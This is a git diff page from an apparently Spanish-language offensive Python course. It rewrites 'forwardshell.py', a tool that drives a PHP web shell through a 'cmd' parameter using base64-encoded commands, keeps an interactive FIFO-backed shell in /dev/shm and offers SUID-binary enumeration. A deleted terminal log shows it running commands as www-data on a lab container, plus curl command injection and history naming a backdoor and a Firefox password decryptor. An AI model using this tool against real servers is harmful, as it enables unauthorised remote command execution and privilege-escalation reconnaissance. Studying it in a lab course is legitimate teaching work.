manuelver/Curso-lenguaje-python
1
0
Fork 0
Code Issues Pull Requests Releases Activity

Compare commits

base: manuelver:5d7e3302c5feae15c030a6190ef809f0ca047d30
Branches Tags
manuelver:main
...
compare: manuelver:d7252c6782d4eab1eb48f3db0ecbd3d1d3f46a5a
Branches Tags
manuelver:main

2 Commits
5d7e3302c5 ... d7252c6782

Author SHA1 Message Date
Manuel Vergara
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
Manuel Vergara
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions
Expand all files Collapse all files

146
python-ofensivo/15_hacking/12_fs/script/forwardshell.py
View File

@@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
import time
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
from random import randrange
signal.signal(signal.SIGINT, def_handler)
class ForwardShell:
main_url = "http://localhost/index.php"
def __init__(self):
session = randrange(100000, 999999)
self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text
except:
pass
return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True:
command = input(colored("> ", "yellow"))
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
def run_command(command):
if command.strip() == "enum suid":
command = b64encode(command.encode()).decode()
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
if command.strip() == "help":
r = requests.get(main_url, params=data)
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
return r.text
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if __name__ == '__main__':
if self.is_pseudo_terminal:
lines = output_command.split("\n")
while True:
if len(lines) == 1:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
cleared_output = '\n'.join([lines[-1]] + lines[:1])
print(output_command)
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command)
self.clear_stdout()

29
python-ofensivo/15_hacking/12_fs/script/main.py Normal file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()

169
python-ofensivo/15_hacking/12_fs/typescript
View File

@@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]


7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%


🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l
 script/[?25h
]2;script/]1;script/%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l
 #!/usr/bin/env python3[?25h
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l
 code forwardshell.py[?25h
]2;code forwardshell.py]1;code%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C